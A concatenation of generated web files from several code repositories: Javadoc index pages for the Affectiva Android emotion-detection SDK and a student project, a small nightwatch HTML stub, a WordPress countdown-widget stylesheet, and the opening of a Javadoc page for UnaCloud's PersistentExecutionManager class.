<div class="block"><i>as of version 3.1.1 - see new licensing policy: http://developer.affectiva.com</i></div>
</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setLicenseStream(java.io.Reader)">setLicenseStream(Reader)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block"><span class="strong">Deprecated.</span>
<div class="block"><i>as of version 3.1.1 - see new licensing policy: http://developer.affectiva.com</i></div>
</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#setMaxProcessRate(float)">setMaxProcessRate(float)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">The maximum processing rate to operate in [FPS].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#setOnCameraEventListener(com.affectiva.android.affdex.sdk.detector.CameraDetector.CameraEventListener)">setOnCameraEventListener(CameraDetector.CameraEventListener)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#setSendUnprocessedFrames(boolean)">setSendUnprocessedFrames(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">When the SDK is in control of the camera, if the SDK frame rate is lower than the camera frame rate, there will
be frames that are not processed for expressions by the SDK.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#setTargetRotation(com.affectiva.android.affdex.sdk.Frame.ROTATE)">setTargetRotation(Frame.ROTATE)</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Set <code>Frame</code>'s rotation angle.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#start()">start()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">Initiates processing of frames received from the device's camera.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#start()">start()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#start()">start()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Initializes the FrameDetector in preparation for handling frames subsequently pushed via
<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#process(com.affectiva.android.affdex.sdk.Frame, float)"><code>FrameDetector.process(com.affectiva.android.affdex.sdk.Frame, float)</code></a></div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#start()">start()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">PhotoDetector</a></dt>
<dd>
<div class="block">Initializes the PhotoDetector in preparation for handling photos subsequently pushed via
<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#process(com.affectiva.android.affdex.sdk.Frame)"><code>PhotoDetector.process(com.affectiva.android.affdex.sdk.Frame)</code></a></div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#start()">start()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd>
<div class="block">Initiates processing of the video file.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#stop()">stop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">Stops processing frames received from the device's camera, and releases the camera to allow its use by other
apps.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#stop()">stop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#stop()">stop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Notifies the FrameDetector that the last frame has been pushed via <a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#process(com.affectiva.android.affdex.sdk.Frame, float)"><code>FrameDetector.process(com.affectiva.android.affdex.sdk.Frame, float)</code></a>, allowing it to
deallocate resources.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#stop()">stop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">PhotoDetector</a></dt>
<dd>
<div class="block">Notifies the PhotoDetector that the last photo has been pushed via <a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#process(com.affectiva.android.affdex.sdk.Frame)"><code>PhotoDetector.process(com.affectiva.android.affdex.sdk.Frame)</code></a>, allowing it to
deallocate resources.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#stop()">stop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd>
<div class="block">Allows the VideoFileProcessor to deallocate resources when processing is complete.</div>
</dd>
</dl>
<a name="_T_">
<!-- -->
</a>
<h2 class="title">T</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#TAG">TAG</a></span> - Static variable in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#toByteArrayFrame()">toByteArrayFrame()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd>
<div class="block">Extract byte array from bitmap, be careful when using it, it allocates memory when needed.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html#toDouble()">toDouble()</a></span> - Method in enum com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html" title="enum in com.affectiva.android.affdex.sdk">Frame.ROTATE</a></dt>
<dd>
<div class="block">Method to get the rotation angle.</div>
</dd>
</dl>
<a name="_V_">
<!-- -->
</a>
<h2 class="title">V</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraType.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraType.html" title="enum in com.affectiva.android.affdex.sdk.detector">CameraDetector.CameraType</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceDetectorMode.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceDetectorMode.html" title="enum in com.affectiva.android.affdex.sdk.detector">Detector.FaceDetectorMode</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.AGE</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.EMOJI</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.ETHNICITY</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.GENDER</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.GLASSES</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.COLOR_FORMAT.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.COLOR_FORMAT.html" title="enum in com.affectiva.android.affdex.sdk">Frame.COLOR_FORMAT</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html#valueOf(java.lang.String)">valueOf(String)</a></span> - Static method in enum com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html" title="enum in com.affectiva.android.affdex.sdk">Frame.ROTATE</a></dt>
<dd>
<div class="block">Returns the enum constant of this type with the specified name.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraType.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraType.html" title="enum in com.affectiva.android.affdex.sdk.detector">CameraDetector.CameraType</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceDetectorMode.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceDetectorMode.html" title="enum in com.affectiva.android.affdex.sdk.detector">Detector.FaceDetectorMode</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.AGE</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.EMOJI</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.ETHNICITY</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.GENDER</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.GLASSES</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.COLOR_FORMAT.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.COLOR_FORMAT.html" title="enum in com.affectiva.android.affdex.sdk">Frame.COLOR_FORMAT</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html#values()">values()</a></span> - Static method in enum com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html" title="enum in com.affectiva.android.affdex.sdk">Frame.ROTATE</a></dt>
<dd>
<div class="block">Returns an array containing the constants of this enum type, in
the order they are declared.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">VideoFileDetector</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A Detector for processing video files.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#VideoFileDetector(Context, java.lang.String, int, com.affectiva.android.affdex.sdk.detector.Detector.FaceDetectorMode)">VideoFileDetector(Context, String, int, Detector.FaceDetectorMode)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd>
<div class="block">Creates a VideoFileDetector.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#VideoFileDetector(Context, java.lang.String)">VideoFileDetector(Context, String)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd>
<div class="block">Creates a VideoFileDetector.</div>
</dd>
</dl>
<a href="#_A_">A</a> <a href="#_C_">C</a> <a href="#_D_">D</a> <a href="#_E_">E</a> <a href="#_F_">F</a> <a href="#_G_">G</a> <a href="#_I_">I</a> <a href="#_L_">L</a> <a href="#_M_">M</a> <a href="#_O_">O</a> <a href="#_P_">P</a> <a href="#_Q_">Q</a> <a href="#_R_">R</a> <a href="#_S_">S</a> <a href="#_T_">T</a> <a href="#_V_">V</a> </div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="./overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="./overview-tree.html">Tree</a></li>
<li><a href="./deprecated-list.html">Deprecated</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="./help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><img src="./affectiva.png"></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="./index.html?index-all.html" target="_top">Frames</a></li>
<li><a href="index-all.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="./allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
public/views/nightwatch.html
|
vvscode/js--nightwatch-recorder
|
<html>
<head>
<title>NightwatchJS Renderer</title>
<script src="../js/nightwatch.js"></script>
</head>
</html>
|
doc/index-files/index-12.html
|
CMPUT301W14T3/Group-Project
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.6.0_30) on Tue Apr 08 09:07:03 MDT 2014 -->
<title>N-Index</title>
<meta name="date" content="2014-04-08">
<link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="N-Index";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li>Use</li>
<li><a href="../overview-tree.html">Tree</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="index-11.html">PREV LETTER</a></li>
<li><a href="index-13.html">NEXT LETTER</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?index-filesindex-12.html" target="_top">FRAMES</a></li>
<li><a href="index-12.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="contentContainer"><a href="index-1.html">A</a> <a href="index-2.html">B</a> <a href="index-3.html">C</a> <a href="index-4.html">D</a> <a href="index-5.html">E</a> <a href="index-6.html">F</a> <a href="index-7.html">G</a> <a href="index-8.html">H</a> <a href="index-9.html">I</a> <a href="index-10.html">L</a> <a href="index-11.html">M</a> <a href="index-12.html">N</a> <a href="index-13.html">O</a> <a href="index-14.html">P</a> <a href="index-15.html">R</a> <a href="index-16.html">S</a> <a href="index-17.html">T</a> <a href="index-18.html">U</a> <a href="index-19.html">V</a> <a name="_N_">
<!-- -->
</a>
<h2 class="title">N</h2>
<dl>
<dt><span class="strong"><a href="../cs/ualberta/ca/tunein/R.id.html#name_button">name_button</a></span> - Static variable in class cs.ualberta.ca.tunein.<a href="../cs/ualberta/ca/tunein/R.id.html" title="class in cs.ualberta.ca.tunein">R.id</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="../cs/ualberta/ca/tunein/UserController.html#NEWPROFILE">NEWPROFILE</a></span> - Static variable in class cs.ualberta.ca.tunein.<a href="../cs/ualberta/ca/tunein/UserController.html" title="class in cs.ualberta.ca.tunein">UserController</a></dt>
<dd> </dd>
</dl>
<a href="index-1.html">A</a> <a href="index-2.html">B</a> <a href="index-3.html">C</a> <a href="index-4.html">D</a> <a href="index-5.html">E</a> <a href="index-6.html">F</a> <a href="index-7.html">G</a> <a href="index-8.html">H</a> <a href="index-9.html">I</a> <a href="index-10.html">L</a> <a href="index-11.html">M</a> <a href="index-12.html">N</a> <a href="index-13.html">O</a> <a href="index-14.html">P</a> <a href="index-15.html">R</a> <a href="index-16.html">S</a> <a href="index-17.html">T</a> <a href="index-18.html">U</a> <a href="index-19.html">V</a> </div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li>Use</li>
<li><a href="../overview-tree.html">Tree</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="index-11.html">PREV LETTER</a></li>
<li><a href="index-13.html">NEXT LETTER</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?index-filesindex-12.html" target="_top">FRAMES</a></li>
<li><a href="index-12.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
wp-content/plugins/t-countdown-control/style/carbonlite/style.css
|
baden03/access48
|
/*above the dashboard*/
.carbonlite-tophtml {
margin: 0;
padding: 0;
}
/*above the dashboard*/
.carbonlite-dashboard {
height: 127px;
width: 250px;
margin: 0 auto;
padding-top: 10px;
padding-left: 10px;
background: transparent url('images/bg_countdown.png') 0 0 no-repeat;
}
.carbonlite-dash {
width: 42px;
height: 44px;
float: left;
margin-left: 2px;
padding-left: 2px;
padding-top: 10px;
position: relative;
color: #FFF;
}
.carbonlite-tripdash {
width: 62px;
height: 44px;
float: left;
margin-left: 2px;
padding-left: 2px;
padding-top: 10px;
position: relative;
color: #FFF;
}
.carbonlite-hours_dash, .carbonlite-minutes_dash, .carbonlite-seconds_dash {
background: transparent url('images/bg_dash.png') 0 0 no-repeat;
}
.carbonlite-days_dash {
margin-left: 2px;
background: transparent url('images/bg_dash.png') 0 0 no-repeat;
}
.carbonlite-days_trip_dash, .carbonlite-hours_trip_dash {
background: transparent url('images/bg_trip_dash.png') 0 0 no-repeat;
}
.carbonlite-weeks_dash {
margin-left: 2px;
background: transparent url('images/bg_dash.png') 0 0 no-repeat;
}
.carbonlite-weeks_trip_dash {
margin-left: 2px;
background: transparent url('images/bg_trip_dash.png') 0 0 no-repeat;
}
.carbonlite-digit {
font: normal normal normal 12pt/normal arial;
float: left;
width: 17px;
text-align: center;
position: relative;
}
.carbonlite-dash .carbonlite-dash_title {
display: block;
position: absolute;
text-transform:uppercase;
top: 37px;
color: #AAA;
text-align: center;
font-size: 9px;
}
.carbonlite-tripdash .carbonlite-dash_title {
display: block;
position: absolute;
text-transform:uppercase;
top: 37px;
color: #AAA;
text-align: center;
font-size: 9px;
}
/*below the dashboard*/
.carbonlite-bothtml {
margin: 0;
padding: 0;
}
|
docs/uniandes/unacloud/agent/execution/PersistentExecutionManager.html
|
UnaCloud/UnaCloud2
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.7.0_60) on Thu May 18 11:17:06 COT 2017 -->
<title>PersistentExecutionManager</title>
<meta name="date" content="2017-05-18">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="PersistentExecutionManager";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/PersistentExecutionManager.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../uniandes/unacloud/agent/execution/ImageCacheManager.html" title="class in uniandes.unacloud.agent.execution"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../uniandes/unacloud/agent/execution/Scheduler.html" title="class in uniandes.unacloud.agent.execution"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?uniandes/unacloud/agent/execution/PersistentExecutionManager.html" target="_top">Frames</a></li>
<li><a href="PersistentExecutionManager.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">uniandes.unacloud.agent.execution</div>
<h2 title="Class PersistentExecutionManager" class="title">Class PersistentExecutionManager</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>uniandes.unacloud.agent.execution.PersistentExecutionManager</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">PersistentExecutionManager</span>
extends java.lang.Object</pre>
<div class="block">Responsible for managing executions. This class is responsible to schedule execution startups and
stops. The process is: given a execution and a time t, this class ensures that this execution is going to be turn on for a time t
The execution only is stopped when the time t is burnt-out or when the user sends a request to stop it. If this physical machine is turned off,
then the next time the physical machine starts the execution will be powered on.<br/>
To schedule the execution turn off we used a Timer that manage a collection of TimerTask objects, each timer task is responsible for
stopping one execution</div>
<dl><dt><span class="strong">Author:</span></dt>
<dd>Clouder</dd></dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
